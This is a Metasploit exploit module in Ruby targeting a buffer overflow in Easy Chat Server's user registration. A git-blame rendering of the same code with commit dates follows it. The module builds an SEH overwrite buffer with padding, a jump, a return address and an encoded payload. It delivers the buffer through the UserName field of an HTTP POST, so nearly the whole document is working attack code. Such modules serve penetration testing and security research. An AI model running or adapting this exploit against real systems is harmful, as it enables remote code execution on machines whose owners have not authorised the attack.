metasploit-framework/modules/exploits/windows/http/easychatserver_seh.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
      'Description'    => %q{
        This module exploits a buffer overflow during user registration in Easy Chat Server software.
      },
      'Author'         =>
        [
          'Marco Rivoli', #Metasploit
          'Aitezaz Mohsin' #POC
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '42155' ],
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
        ],
      'DefaultOptions' => {
          'RPORT' => 80,
          'EXITFUNC' => 'thread',
          'ENCODER' => 'x86/alpha_mixed'
        },
      'DisclosureDate' => 'Oct 09 2017',
      'DefaultTarget'  => 0))
  end

  def exploit
    sploit = rand_text_alpha_upper(217)
    sploit << "\xeb\x06\x90\x90"
    sploit << [target.ret].pack('V')
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(200)

    res = send_request_cgi({
      'uri'    => normalize_uri(URI,'registresult.htm'),
      'method' => 'POST',
      'vars_post'  => {
        'UserName' => sploit,
        'Password' => 'test',
        'Password1' => 'test',
        'Sex' => 1,
        'Email' => 'x@',
        'Icon' => 'x.gif',
        'Resume' => 'xxxx',
        'cw' => 1,
        'RoomID' => 4,
        'RepUserName' => 'admin',
        'submit1' => 'Register'
      }
    })
    handler

  end
end
Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit 2017-06-19 22:36:59 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit 2017-06-19 22:36:59 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Remote`

			`Rank = NormalRanking`

Exploit now uses HTTP mixin 2017-06-25 14:33:17 +00:00			`include Msf::Exploit::Remote::HttpClient`
Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit 2017-06-19 22:36:59 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',`
			`'Description' => %q{`
			`This module exploits a buffer overflow during user registration in Easy Chat Server software.`
			`},`
			`'Author' =>`
			`[`
Exploit now uses HTTP mixin 2017-06-25 14:33:17 +00:00			`'Marco Rivoli', #Metasploit`
			`'Aitezaz Mohsin' #POC`
Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit 2017-06-19 22:36:59 +00:00			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Correct EDB Number 2017-06-19 22:52:29 +00:00			`[ 'EDB', '42155' ],`
Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit 2017-06-19 22:36:59 +00:00			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],`
			`],`
			`'DefaultOptions' => {`
			`'RPORT' => 80,`
			`'EXITFUNC' => 'thread',`
			`'ENCODER' => 'x86/alpha_mixed'`
			`},`
			`'DisclosureDate' => 'Oct 09 2017',`
			`'DefaultTarget' => 0))`
			`end`

			`def exploit`
			`sploit = rand_text_alpha_upper(217)`
			`sploit << "\xeb\x06\x90\x90"`
			`sploit << [target.ret].pack('V')`
			`sploit << payload.encoded`
			`sploit << rand_text_alpha_upper(200)`

Exploit now uses HTTP mixin 2017-06-25 14:33:17 +00:00			`res = send_request_cgi({`
			`'uri' => normalize_uri(URI,'registresult.htm'),`
			`'method' => 'POST',`
			`'vars_post' => {`
			`'UserName' => sploit,`
			`'Password' => 'test',`
			`'Password1' => 'test',`
			`'Sex' => 1,`
			`'Email' => 'x@',`
			`'Icon' => 'x.gif',`
			`'Resume' => 'xxxx',`
			`'cw' => 1,`
			`'RoomID' => 4,`
			`'RepUserName' => 'admin',`
			`'submit1' => 'Register'`
			`}`
			`})`
Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit 2017-06-19 22:36:59 +00:00			`handler`
Exploit now uses HTTP mixin 2017-06-25 14:33:17 +00:00
Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit 2017-06-19 22:36:59 +00:00			`end`
			`end`